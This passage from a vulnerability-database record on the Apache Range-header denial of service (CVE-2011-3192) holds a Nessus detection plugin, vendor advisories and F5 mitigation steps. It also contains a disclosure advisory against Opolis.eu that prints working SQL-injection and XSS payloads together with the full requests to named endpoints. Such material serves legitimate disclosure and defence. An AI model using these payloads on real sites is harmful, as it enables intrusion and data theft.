and 2.2.x through 2.2.19 allows remote attackers to cause a\ndenial of service (memory and CPU consumption) via a Range header that\nexpresses multiple overlapping ranges, as exploited in the wild in\nAugust 2011, a different vulnerability than CVE-2007-0086.", "modified": "2019-11-02T00:00:00", "id": "ALA_ALAS-2011-01.NASL", "href": "https://www.tenable.com/plugins/nessus/69560", "published": "2013-09-04T00:00:00", "title": "Amazon Linux AMI : httpd (ALAS-2011-01)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2011-01.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(69560);\n script_version(\"$Revision: 1.9 $\");\n script_cvs_date(\"$Date: 2015/01/30 14:43:52 $\");\n\n script_cve_id(\"CVE-2011-3192\");\n script_xref(name:\"ALAS\", value:\"2011-01\");\n script_xref(name:\"RHSA\", value:\"2011:1245\");\n\n script_name(english:\"Amazon Linux AMI : httpd (ALAS-2011-01)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The MITRE CVE database describes CVE-2011-3192 as :\n\nThe byterange filter in the Apache HTTP Server 1.3.x, 2.0.x through\n2.0.64, and 2.2.x through 2.2.19 allows remote attackers to cause a\ndenial of service (memory and CPU consumption) via a Range header that\nexpresses multiple overlapping ranges, as exploited in the wild in\nAugust 2011, a different vulnerability than CVE-2007-0086.\"\n );\n # http://lists.opensuse.org/opensuse-security-announce/2011-09/msg00006.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?4868d419\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.ubuntu.com/usn/USN-1199-1/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2011-1.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Run 'yum upgrade httpd' to upgrade your system. Then run 'service\nhttpd restart' to restart the Apache HTTP Server.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/09/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/09/04\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2015 Tenable Network Security, Inc.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/AmazonLinux/release\")) audit(AUDIT_OS_NOT, \"Amazon Linux AMI\");\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"httpd-2.2.21-1.18.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"httpd-debuginfo-2.2.21-1.18.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"httpd-devel-2.2.21-1.18.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"httpd-manual-2.2.21-1.18.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"httpd-tools-2.2.21-1.18.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"mod_ssl-2.2.21-1.18.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"httpd / httpd-debuginfo / httpd-devel / httpd-manual / httpd-tools / etc\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "amazon": [{"lastseen": "2019-05-29T17:22:27", "bulletinFamily": "unix", "description": "**Issue Overview:**\n\nThe Apache HTTP Server is a popular web server.\n\nA flaw was found in the way the Apache HTTP Server handled Range HTTP headers. A remote attacker could use this flaw to cause httpd to use an excessive amount of memory and CPU time via HTTP requests with a specially-crafted Range header. ([CVE-2011-3192 __](<https://access.redhat.com/security/cve/CVE-2011-3192>))\n\nAll httpd users should upgrade to these updated packages, which contain a backported patch to correct this issue. After installing the updated packages, the httpd daemon must be restarted for the update to take effect.\n\n \n**Affected Packages:** \n\n\nhttpd\n\n \n**Issue Correction:** \nRun _yum update httpd_ to update your system.\n\n \n\n\n**New Packages:**\n \n \n i686: \n httpd-devel-2.2.21-1.18.amzn1.i686 \n httpd-debuginfo-2.2.21-1.18.amzn1.i686 \n httpd-2.2.21-1.18.amzn1.i686 \n httpd-tools-2.2.21-1.18.amzn1.i686 \n mod_ssl-2.2.21-1.18.amzn1.i686 \n \n noarch: \n httpd-manual-2.2.21-1.18.amzn1.noarch \n \n src: \n httpd-2.2.21-1.18.amzn1.src \n \n x86_64: \n mod_ssl-2.2.21-1.18.amzn1.x86_64 \n httpd-tools-2.2.21-1.18.amzn1.x86_64 \n httpd-2.2.21-1.18.amzn1.x86_64 \n httpd-devel-2.2.21-1.18.amzn1.x86_64 \n httpd-debuginfo-2.2.21-1.18.amzn1.x86_64 \n \n \n", "modified": "2014-09-14T14:25:00", "published": "2014-09-14T14:25:00", "id": "ALAS-2011-001", "href": "https://alas.aws.amazon.com/ALAS-2011-1.html", "title": "Medium: httpd", "type": "amazon", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "packetstorm": [{"lastseen": "2016-12-05T22:11:40", "bulletinFamily": "exploit", "description": "", "modified": "2013-10-07T00:00:00", "published": "2013-10-07T00:00:00", "href": "https://packetstormsecurity.com/files/123527/Opolis.eu-Secure-Mail-Blind-SQL-Injection-XSS-CSRF-DoS.html", "id": "PACKETSTORM:123527", "type": "packetstorm", "title": "Opolis.eu Secure Mail Blind SQL Injection / XSS / CSRF / DoS", "sourceData": "`========================================================================================================================================================================= \nOPOLIS.EU SECURE MAIL Blind SQLInjection / Cross site scripting / CSRF / Apacche httpd Remote D.O.S /PHP hangs on parsing particular strings as floating point number/User credentials are sent in clear text \n========================================================================================================================================================================== \n \nTIME-LINE VULNERABILITY \n \nMultiples Advisories \n \nOpolis Secure IT-Services GmbH \n \nAddress:Romberggasse 3 \n1230 Vienna \nAustria \nE-Mail Contact: helpdesk@opolis.eu<helpdesk@opolis.eu> \n \nBUT \n \nNot Response \n \nTHEN \n \nFull Disclosure \n \n \nI. VULNERABILITY \n------------------------- \n#Title: OPOLIS.EU SECURE MAIL BLIND SQLInjection / Cross site scripting /Cross Site Request Forgery/ Apache httpd Remote D.O.S /PHP hangs on parsing particular strings as floating point number/ Credentials are sent in clear text \n \n#Vendor:http://www.opolis.eu/ \n \n#Author:Juan Carlos Garc\u00eda (@secnight) \n \n#Follow me \nTwitter:@secnight \n \nII. DESCRIPTION \n------------------------- \nOpolis Secure Mail is dedicated to provide the most user-friendly high-security E-Mail and document messaging service. \nOpolis re-defines E-Mail with its \u201cPower to the Sender\u201d philosophy: The sender decides if or how E-Mails may be further \nprocessed and the sender monitors the processing and forwarding flow of messages. Opolis also offers co-branded solutions \nfor internet and E-Mail communication as well as document messaging. Opolis Secure Mail is owned by privately-held PI Technology Co WLL. \n \nIII. PROOF OF CONCEPT \n------------------------- \n \nBlind SQL Injection \n******************** \n \nVulnerability description \n------------------------- \n \nSQL injection is a vulnerability that allows an attacker to alter back-end SQL statements by manipulating the user input. An SQL injection occurs when web applications accept user input that is directly placed into a SQL statement and \n \ndoesn't properly filter out dangerous characters. \n \nThis is one of the most common application layer attacks currently being used on the Internet. Despite the fact that it is relatively easy to protect against, there is a large number of web applications vulnerable. \n \nAffected items \n---------------- \n \n/createOpolisWorkGroup/createOpolisWorkGroupStep5.php \n \n \nURL encoded POST input checkedemail was set to 1';select pg_sleep(2); -- \n \nPOST /createOpolisWorkGroup/createOpolisWorkGroupStep5.php \n \naiacademic=1&aiaddressline1=3137%20Laguna%20Street&aiaddressline2=3137%20Laguna%20Street&aicity=San%20Francisco&aicountry=NIL&aifirstname=myufyvmc&ailanguage=English&ailastname=myufyvmc&aititle=Mr.&aizip=94102&checkedemail=1%27%3bselect \n \n%20pg_sleep%282%29%3b%20--%20&checkedloginname=&createcodes=&showcheckedemail=sample%40email.tst&showcheckedloginname=myufyvmc \n \n \n \n/slimstat/stats_js.php \n \n\"ttl\" \n \nURL encoded GET input \"ttl\" was set to IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDEADBEEF)),SLEEP(3))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDEADBEEF)),SLEEP(3)))OR'|\"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK \n \n(2000000,SHA1(0xDEADBEEF)),SLEEP(3)))OR\"*/ \n \n \n \nGET /slimstat/stats_js.php?ref=&res=1920x1080&ts=1381056265&ttl=IF%28SUBSTR%28%40%40version%2c1%2c1%29%3c5%2cBENCHMARK%282000000%2cSHA1%280xDEADBEEF%29%29%2cSLEEP%283%29%29%2f*%27XOR%28IF%28SUBSTR%28%40%40version \n \n%2c1%2c1%29%3c5%2cBENCHMARK%282000000%2cSHA1%280xDEADBEEF%29%29%2cSLEEP%283%29%29%29OR%27%7c%22XOR%28IF%28SUBSTR%28%40%40version%2c1%2c1%29%3c5%2cBENCHMARK%282000000%2cSHA1%280xDEADBEEF%29%29%2cSLEEP%283%29%29%29OR%22*% \n \nGET /slimstat/stats_js.php?ref=&res=1920x1080&ts=1381056265&ttl=IF%28SUBSTR%28%40%40version%2c1%2c1%29%3c5%2cBENCHMARK%282000000%2cSHA1%280xDEADBEEF%29%29%2cSLEEP%283%29%29%2f*%27XOR%28IF%28SUBSTR%28%40%40version \n \n%2c1%2c1%29%3c5%2cBENCHMARK%282000000%2cSHA1%280xDEADBEEF%29%29%2cSLEEP%283%29%29%29OR%27%7c%22XOR%28IF%28SUBSTR%28%40%40version%2c1%2c1%29%3c5%2cBENCHMARK%282000000%2cSHA1%280xDEADBEEF%29%29%2cSLEEP%283%29%29%29OR%22*% \n \n \n\"url\" \n \nURL encoded GET input \"url\" was set to IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDEADBEEF)),SLEEP(3))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDEADBEEF)),SLEEP(3)))OR'|\"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK \n \n(2000000,SHA1(0xDEADBEEF)),SLEEP(3)))OR\"*/ \n \n \n \nGET /slimstat/stats_js.php?ref=&res=1920x1080&ts=1381056265&ttl=O!polis%20Secure%20Mail%20Service&url=IF%28SUBSTR%28%40%40version%2c1%2c1%29%3c5%2cBENCHMARK%282000000%2cSHA1%280xDEADBEEF%29%29%2cSLEEP%283%29%29%2f*%27XOR%28IF%28SUBSTR \n \n%28%40%40version%2c1%2c1%29%3c5%2cBENCHMARK%282000000%2cSHA1%280xDEADBEEF%29%29%2cSLEEP%283%29%29%29OR%27%7c%22XOR%28IF%28SUBSTR%28%40%40version%2c1%2c1%29%3c5%2cBENCHMARK%282000000%2cSHA1%280xDEADBEEF%29%29%2cSLEEP%283%29%29%29OR%22*%2f \n \n \nGET /slimstat/stats_js.php?ref=&res=1920x1080&ts=1381056265&ttl=O!polis%20Secure%20Mail%20Service&url=IF%28SUBSTR%28%40%40version%2c1%2c1%29%3c5%2cBENCHMARK%282000000%2cSHA1%280xDEADBEEF%29%29%2cSLEEP%283%29%29%2f*%27XOR%28IF%28SUBSTR \n \n%28%40%40version%2c1%2c1%29%3c5%2cBENCHMARK%282000000%2cSHA1%280xDEADBEEF%29%29%2cSLEEP%283%29%29%29OR%27%7c%22XOR%28IF%28SUBSTR%28%40%40version%2c1%2c1%29%3c5%2cBENCHMARK%282000000%2cSHA1%280xDEADBEEF%29%29%2cSLEEP%283%29%29%29OR%22*%2f \n \n \nCross site scripting ( 67 ) \n********************* \n \nCross site scripting (also referred to as XSS) is a vulnerability that allows an attacker to send malicious \ncode (usually in the form of Javascript) to another user. Because a browser cannot know if the script should be \ntrusted or not, it will execute the script in the user context allowing the attacker to access any cookies \nor session tokens retained by the browser. \n \nAffected items \n---------------- \n \n/createOpolisWorkGroup/createOpolisWorkGroupStep1.php (2) \n \nURL encoded POST input OSMLogInNam was set to hkmohkhr_974672\"():;934304 \n \n \nPOST /createOpolisWorkGroup/createOpolisWorkGroupStep1.php \n \ncheckloginname=&OSMLogInNam=hkmohkhr_974672%22%28%29%3a%3b934304 \n \n \n \n/createOpolisWorkGroup/createOpolisWorkGroupStep2.php (2) \n \nURL encoded POST input currentEmail was set to sample%40email.tst_940309\"():;974560 \n \n \nPOST /createOpolisWorkGroup/createOpolisWorkGroupStep2.php \n \ncurrentEmail=sample%2540email.tst_940309%22%28%29%3a%3b974560&showcheckedloginname=rgrdtkbl \n \n \n \n/OpolisSignUp/OpolisSignUpStep1a.php (2) \n \nURL encoded POST input OSMLogInNam was set to etomstqd_911786\"():;974637 \n \nPOST /OpolisSignUp/OpolisSignUpStep1a.php \n \ncheckloginname=&OSMLogInNam=etomstqd_911786%22%28%29%3a%3b974637 \n \n \n \n \n/OpolisSignUp/OpolisSignUpStep2a.php \n \nURL encoded POST input currentEmail was set to sample%40email.tst_928249\"():;986211 \n \nThe input is reflected inside <script> tag between double quotes. \n \n \n \nPOST /OpolisSignUp/OpolisSignUpStep2a.php \n \n \ncurrentEmail=sample%2540email.tst_928249%22%28%29%3a%3b986211&showcheckedloginname=vethpimh \n \n \n/createOpolisWorkGroup/createOpolisWorkGroupStep2.php. (3) \n \nURL encoded POST input checkedloginname was set to 1\" onmouseover=prompt(939864) bad=\" \n \n \nPOST /createOpolisWorkGroup/createOpolisWorkGroupStep2.php \n \ncheckedloginname=1%22%20onmouseover%3dprompt%28939864%29%20bad%3d%22&showEmailfield= \n \n \n \n/createOpolisWorkGroup/createOpolisWorkGroupStep3.php. (5) \n \n \nURL encoded POST input checkedemail was set to 1\" onmouseover=prompt(911118) bad=\" \n \nPOST /createOpolisWorkGroup/createOpolisWorkGroupStep3.php \n \ncheckedemail=1%22%20onmouseover%3dprompt%28911118%29%20bad%3d%22&checkedloginname=&showverifyEmailfield \n \n \n \nPOST /createOpolisWorkGroup/createOpolisWorkGroupStep4.php. (5) \n \nURL encoded POST input checkedemail was set to 1\" onmouseover=prompt(967963) bad=\" \n \ncheckedemail=1%22%20onmouseover%3dprompt%28967963%29%20bad%3d%22&checkedloginname=&createcodes=&showcheckedemail=sample%40email.tst&showcheckedloginname=juvgwacr&verifycurrentEmail=sample%40email.tst \n \n \n \n/createOpolisWorkGroup/createOpolisWorkGroupStep5.php. (52) \n \nURL encoded POST input aicountry was set to Antarctica'\"()&%<ScRiPt >prompt(973546)</ScRiPt> \n \naiacademic=1&aiaddressline1=3137%20Laguna%20Street&aiaddressline2=3137%20Laguna%20Street&aicity=San%20Francisco&aicountry=Antarctica%27%22%28%29%26%25%3cScRiPt%20%3eprompt%28973546%29%3c%2fScRiPt \n \n%3e&aifirstname=kmaqpmwp&ailanguage=English&ailastname=kmaqpmwp&aititle=Mr.&aizip=94102&checkedemail=&checkedloginname=&createcodes=&showcheckedemail=sample%40email.tst&showcheckedloginname=kmaqpmwp \n \n \n \n \n/OpolisSignUp/OpolisSignUpStep2a.php. (3) \n \nURL encoded POST input checkedloginname was set to 1\" onmouseover=prompt(994853) bad=\" \n \ncheckedloginname=1%22%20onmouseover%3dprompt%28994853%29%20bad%3d%22&showEmailfield= \n \n \n/OpolisSignUp/OpolisSignUpStep3a.php. (5) \n \nURL encoded POST input checkedemail was set to 1\" onmouseover=prompt(935016) bad=\" \n \ncheckedemail=1%22%20onmouseover%3dprompt%28935016%29%20bad%3d%22&checkedloginname=&showverifyEmailfield= \n \n \nCross Site Request Forgery CSRF (12) \n******************************* \n \nCross-site request forgery, also known as a one-click attack or session riding and abbreviated as CSRF or XSRF, \nis a type of malicious exploit of a website whereby unauthorized commands are transmitted from a user that the website trusts. \n \n \nAffected items \n--------------- \n/createOpolisWorkGroup/createOpolisWorkGroupStep1.php \n/createOpolisWorkGroup/createOpolisWorkGroupStep2.php (f3d86faf83a15fd403feae569c201ee0) \n/createOpolisWorkGroup/createOpolisWorkGroupStep3.php \n/createOpolisWorkGroup/createOpolisWorkGroupStep4.php (32e4ce87958c47459e9174f94651b76d) \n/OpolisSignUp/OpolisSignUpStep1a.php \n/OpolisSignUp/OpolisSignUpStep2a.php (f3d86faf83a15fd403feae569c201ee0) \n/OpolisSignUp/OpolisSignUpStep3a.php \n/slimstat (9200b13decfada22b75676834e865e65) \n \nThe impact of this vulnerability \n--------------------------------- \n \nAn attacker may force the users of a web application to execute actions of the attacker's choosing. \nA successful CSRF exploit can compromise end user data and operation in case of normal user. \nIf the targeted end user is the administrator account, this can compromise the entire web application. \n \n \nTwo examples ( too much security flaws .. ) \n \n/createOpolisWorkGroup/createOpolisWorkGroupStep1.php. (2) \n \nAttack details \n---------------- \nForm name: OSMSignUp \nForm action: http://www.opolis.eu/createOpolisWorkGroup/createOpolisWorkGroupStep1.php \nForm method: POST \n \nForm inputs: \n \ncheckloginname [Hidden] \nOSMLogInNam [Text] \n \n \n/createOpolisWorkGroup/createOpolisWorkGroupStep2.php (f3d86faf83a15fd403feae569c201ee0). \n \nAttack details \n----------------- \nForm name: OSMSignUp \nForm action: http://www.opolis.eu/createOpolisWorkGroup/createOpolisWorkGroupStep2.php \nForm method: POST \n \nForm inputs: \n \nshowcheckedloginname [Text] \ncurrentEmail [Text] \n \nPOST /createOpolisWorkGroup/createOpolisWorkGroupStep2.php \n \ncheckedloginname=&showEmailfield= \n \n \n \nApache httpd Remote D.O.S (2) \n************************** \n \nVulnerability description \n------------------------------- \nA denial of service vulnerability has been found in the way the multiple overlapping ranges are handled by the Apache HTTPD server: \n \nhttp://seclists.org/fulldisclosure/2011/Aug/175 \n \nAn attack tool is circulating in the wild. Active use of this tools has been observed. \n \nThe attack can be done remotely and with a modest number of requests can cause very significant memory and CPU usage on the server. \n \n \nAffected Apache versions (1.3.x, 2.0.x through 2.0.64, and 2.2.x through 2.2.19). \n \n \nHow to fix this vulnerability \n---------------------------- \nUpgrade to the latest version of Apache HTTP Server (2.2.20 or later), available from the Apache HTTP Server Project Web site. \n \nWeb references \n-------------- \nCVE-2011-3192 \nApache HTTPD Security ADVISORY \nApache HTTP Server 2.2.20 Released \nApache httpd Remote Denial of Service (memory exhaustion) \n \n \nApache httpOnly cookie disclosure \n********************************** \n \nVulnerability description \n---------------------------- \nApache HTTP Server 2.2.x through 2.2.21 does not properly restrict header information during construction of Bad Request (aka 400) error documents, which allows remote attackers to obtain the values of HTTPOnly cookies via vectors \n \ninvolving a (1) long or (2) malformed header in conjunction with crafted web script. \n \nAffected Apache versions (up to 2.0.21). \n \nThe impact of this vulnerability \n------------------------------- \nInformation disclosure. \n \nHow to fix this vulnerability \n------------------------------ \nUpgrade Apache 2.x to the latest version. Apache 2.2.22 is the first version that fixed this issue. \n \nWeb references \n--------------- \nFixed in Apache httpd 2.2.22 \nApache HTTP Server 'httpOnly' Cookie Information Disclosure Vulnerability \n \n \n \nPHP hangs on parsing particular strings as floating point number (2) \n***************************************************************** \n \nPHP hangs when parsing '2.2250738585072011e-308' string as a floating point number. \n \nCurrent version is : PHP/5.3.1 \n \nAffected PHP versions: 5.3 up to version 5.3.5 and 5.2 up to version 5.2.17 \n \nAffected items \n--------------- \nWeb Server \n \nThe impact of this vulnerability \n---------------------------------- \nDenial of service attack \n \nHow to fix this vulnerability \n------------------------------- \nUpgrade PHP to the latest version. \n \nWeb references \n----------------- \nPHP Hangs On Numeric Value 2.2250738585072011e-308 \nPHP Homepage \n \n \nUser credentials are sent in clear text \n***************************************** \n \nVulnerability description \n--------------------------- \nUser credentials are transmitted over an unencrypted channel. \nThis information should always be transferred via an encrypted channel (HTTPS) to avoid being intercepted by malicious users. \n \nAffected items \n-------------- \n/slimstat (9200b13decfada22b75676834e865e65) \n \nThe impact of this vulnerability \n---------------------------------- \nA third party may be able to read the user credentials by intercepting an unencrypted HTTP connection. \n \nHow to fix this vulnerability \n------------------------------- \nBecause user credentials are considered sensitive information, should always be transferred to the server over an encrypted connection (HTTPS). \n \n \nIV. BUSINESS IMPACT \n------------------------- \n \n( No Comments... ) \n \nV SOLUTION \n------------------------ \n \nVery easy and I don\u00b4t understand... WRITE SECURE CODE P L E A S E !! \n \n \nVI. CREDITS \n------------------------- \n \nThis vulnerability has been discovered \nby Juan Carlos Garc\u00eda(@secnight) \n \n \nVII. LEGAL NOTICES \n------------------------- \n \nThe Author accepts no responsibility for any damage \ncaused by the use or misuse of this information. \n \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/123527/opolisdoteu-sqlxssxsrfdos.txt", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "f5": [{"lastseen": "2019-12-09T23:27:19", "bulletinFamily": "software", "description": "\nF5 Product Development has assigned ID 366505 (BIG-IP and Enterprise Manager) and ID 366621 (ARX) to this vulnerability. To determine if your release is known to be vulnerable, and for information about releases or hotfixes that resolve the vulnerability, refer to the following table:\n\nProduct | Versions known to be Vulnerable | Versions known to be Not Vulnerable | Vulnerable component or feature \n---|---|---|--- \nBIG-IP LTM | 9.0.0 - 9.4.8 \n10.0.0 - 10.2.2 \n11.0.0 \n| 10.2.2-HF3 \n10.2.3 and later \n11.0.0-HF1 \n11.1.0 and later \n| Configuration utility \n \nVirtual servers are not vulnerable, but may proxy exploits to vulnerable servers \nBIG-IP GTM | 9.2.2 - 9.4.8 \n10.0.0 - 10.2.2 \n11.0.0 | 10.2.2-HF3 \n10.2.3 and later \n11.0.0-HF1 \n11.1.0 and later \n| Configuration utility \nBIG-IP ASM | 9.2.0 - 9.4.8 \n10.0.0 - 10.2.2 \n11.0.0 | 10.2.2-HF3 \n10.2.3 and later \n11.0.0-HF1 \n11.1.0 and later \n| Configuration utility \n \nVirtual servers are not vulnerable, but may proxy exploits to vulnerable servers \nBIG-IP Link Controller | 9.2.2 - 9.4.8 \n10.0.0 - 10.2.2 \n11.0.0 \n| 10.2.2-HF3 \n10.2.3 and later \n11.0.0-HF1 \n11.1.0 and later \n| Configuration utility \n \nVirtual servers are not vulnerable, but may proxy exploits to vulnerable servers \nBIG-IP WebAccelerator | 9.4.0 - 9.4.8 \n10.0.0 - 10.2.2 \n11.0.0 | 10.2.2-HF3 \n10.2.3 and later \n11.0.0-HF1 \n11.1.0 and later \n| Configuration utility \n \nVirtual servers are not vulnerable, but may proxy exploits to vulnerable servers \nBIG-IP PSM | 9.4.0 - 9.4.8 \n10.0.0 - 10.2.2 \n11.0.0 | 10.2.2-HF3 \n10.2.3 and later \n11.0.0-HF1 \n11.1.0 and later \n| Configuration utility \n \nVirtual servers are not vulnerable, but may proxy exploits to vulnerable servers \nBIG-IP WOM | 10.0.0 - 10.2.2 \n11.0.0 | 10.2.2-HF3 \n10.2.3 and later \n11.0.0-HF1 \n11.1.0 and later \n| Configuration utility \n \nVirtual servers are not vulnerable, but may proxy exploits to vulnerable servers \nBIG-IP APM | 10.1.0 - 10.2.2 \n11.0.0 | 10.2.2-HF3 \n10.2.3 and later \n11.0.0-HF1 \n11.1.0 and later \n| Configuration utility \n \nVirtual servers are not vulnerable, but may proxy exploits to vulnerable servers \nBIG-IP Edge Gateway \n| 10.1.0 - 10.2.2 \n11.0.0 | 10.2.2-HF3 \n10.2.3 and later \n11.0.0-HF1 \n11.1.0 and later \n| Configuration utility \n \nVirtual servers are not vulnerable, but may proxy exploits to vulnerable servers \nBIG-IP Analytics \n| 11.0.0 | 11.0.0-HF1 \n11.1.0 and later \n| Configuration utility \n \nBIG-IP AFM | None | 11.3.0 and later | None \nBIG-IP PEM \n| None | 11.3.0 and later | None \nBIG-IP AAM | None | 11.4.0 and later | None \nFirePass | None | 6.x \n7.x | None \nEnterprise Manager | 1.7.0 - 1.8.0 \n2.0.0 - 2.2.0 \n| 2.3.0 and later \n3.x \n| Configuration utility \n \nARX | 5.0.0 - 5.3.1 \n6.0.0 - 6.1.1 | 6.2.0 and later \n| API (disabled by default) \n\n\n * [BIG-IP 11.x](<https://support.f5.com/csp/article/K13114#11.x>)\n * [BIG-IP 10.1.0 through 10.2.2](<https://support.f5.com/csp/article/K13114#10.1.0>)\n * [BIG-IP 9.4.2 through 10.0.1](<https://support.f5.com/csp/article/K13114#9.4.2>)\n * [BIG-IP 9.0.0 through 9.4.1](<https://support.f5.com/csp/article/K13114#9.0.0>)\n * [Configure BIG-IP virtual servers to protect vulnerable back-end Apache servers](<https://support.f5.com/csp/article/K13114#configure>)\n * [FirePass](<https://support.f5.com/csp/article/K13114#firepass>)\n * [Enterprise Manager 2.x](<https://support.f5.com/csp/article/K13114#2.x>)\n * [Enterprise Manager 1.x](<https://support.f5.com/csp/article/K13114#1.x>)\n * [ARX](<https://support.f5.com/csp/article/K13114#arx>)\n\n**BIG-IP 11.x** \n\n\nTo eliminate this vulnerability, upgrade to a version that is listed in the **Versions known to be Not Vulnerable** column of the table.\n\nTo mitigate this vulnerability, you can unset suspect **Range** and **Request-Range** headers in inbound requests. To do so, perform the following procedure: \n\n\n**Impact of procedure:** The **Range** header will be removed from a request only when more than five ranges are specified and the **Request-Range **header will be removed from all requests. \n\n\n 1. Log in to the Traffic Management Shell (**tmsh**) by entering the following command: \n \ntmsh \n \n**Note**: If you are currently logged in to the **tmsh** shell, you can skip this step.\n 2. Modify the configuration of the** httpd **service by typing the following command: \n \nedit sys httpd\n 3. The previous command opens a text editor that you can use to modify the configuration of the **httpd** service. The text editor displays the following line: \n \nmodify httpd { }\n 4. Replace the above line with the following lines: \n \nmodify httpd { \ninclude \" \n# CVE-2011-3192 \n# Drop the Range header when more than 5 ranges \nSetEnvIf Range (,.*?){5,} bad-range=1 \nRequestHeader unset Range env=bad-range \nRequestHeader unset Request-Range\" \n}\n 5. Save the file using the name suggested by the text editor (for example, **/var/tmp/tmsh/2tKkrO/data**).\n 6. Upon exiting the text editor, the** tmsh** displays the following prompt: \n \nSave changes? (y/n/e)\n 7. Save the changes by typing the following: \n \ny\n 8. Save the configuration by typing the following command: \n \nsave sys config\n 9. Restart the** httpd** service by typing the following command: \n \nrestart sys service httpd\n\n**BIG-IP 10.1.0 through 10.2.2**\n\nTo eliminate this vulnerability, upgrade to a version that is listed in the **Versions known to be Not Vulnerable** column of the table.\n\nTo mitigate this vulnerability, you can unset suspect **Range** and **Request-Range **headers in inbound requests. To do so, perform the following procedure: \n\n\n**Impact of procedure:** The **Range** header will be removed from a request only when more than five ranges are specified and the **Request-Range **header will be removed from all requests. \n\n\n 1. Log in to the BIG-IP system command line.\n 2. Change directories to the** /var/tmp** directory by typing the following command: \n \ncd /var/tmp\n 3. Using a text editor, create a new file named **CVE-2011-3192 **and paste the following lines into it: \n \nhttpd include \" \n# CVE-2011-3192 \n# Drop the Range header when more than 5 ranges \nSetEnvIf Range (,.*?){5,} bad-range=1 \nRequestHeader unset Range env=bad-range \nRequestHeader unset Request-Range\" \n\n 4. Save the new file.\n 5. Merge the** CVE-2011-3192** file into the BIG-IP system configuration by typing the following command: \n \nbpsh < CVE-2011-3192\n 6. Save the configuration by typing the following command: \n \nbigpipe save all \n\n 7. Restart the **httpd** service by typing the following command: \n \nbigstart restart httpd\n\n**BIG-IP 9.4.2 through 10.0.1 \n**\n\nTo eliminate this vulnerability, upgrade to a version that is listed in the** Versions known to be Not Vulnerable** column of the table.\n\nTo mitigate this vulnerability, you can unset all **Range** and **Request-Range **headers in inbound requests. To do so, perform the following procedure: \n\n\n**Impact of procedure:** The **Range** and **Request-Range **headers will be removed from all requests.\n\n 1. Log in to the BIG-IP system command line.\n 2. Change directories to the** /var/tmp** directory by typing the following command: \n \ncd /var/tmp\n 3. Using a text editor, create a new file named CVE-2011-3192 and paste the following lines into it: \n \nhttpd include \" \n# CVE-2011-3192 \nRequestHeader unset Range 